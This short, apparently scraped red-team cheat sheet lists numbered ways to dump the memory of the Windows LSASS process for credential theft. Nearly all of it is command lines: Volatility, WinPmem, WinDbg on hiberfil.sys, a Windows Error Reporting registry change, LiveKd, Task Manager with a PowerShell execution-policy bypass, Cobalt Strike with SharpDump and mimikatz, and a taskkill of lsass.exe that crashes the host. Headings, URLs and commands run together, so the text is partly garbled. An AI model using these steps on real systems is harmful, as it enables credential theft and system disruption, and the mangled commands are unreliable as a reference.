Methods:
Create Disk Image Physical Drive Capture Memory LSASS.exe#0x07 > Volatility
Methods:
Pstree volatility -f memory_dump.raw –profile=Win7SP1x64 memdump -p -D#0x08 > WinPmem
Methods:
winpmem.exe -o dump.raw#0x09 > hiberfil.sys
Methods:
windbg.exe -y srvc:\symbolshttp://msdl.microsoft.com/download/symbols -i c:\symbols -z C:\hiberfil.sys Yes !process 0 0 lsass.exe !process 0 0 lsass.exe; .dump /ma #0x10 > Windows Error Reporting
Methods:
HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps->DumpType->2 Lsass-Shtinkering.exe#0x11 > LiveKd
Methods:
LiveKd.exe -w !process 0 0 lsass.exe .process /p [lsass PID] .dump /ma [dump file path]#0x12 > Task Manager
Methods:
Powershell -ep bypass Get-Process lsass C:\Windows\System32\Taskmgr.exe /dumpfile=C:\lsass.dmp /pid=#0x13 > Cobalt Strike+SharpDump
Methods:
Execute-assembly SharpDump Or load sharpdumpsharpdump#0x14 > Cobalt Strike+mimikatz_command
Methods:
Mimikatz_command sekurlsa::minidump#0x15 > Cobalt Strike+taskkill
Methods:
taskkill /f /im lsass.exe#Lsass
@PfkSecurity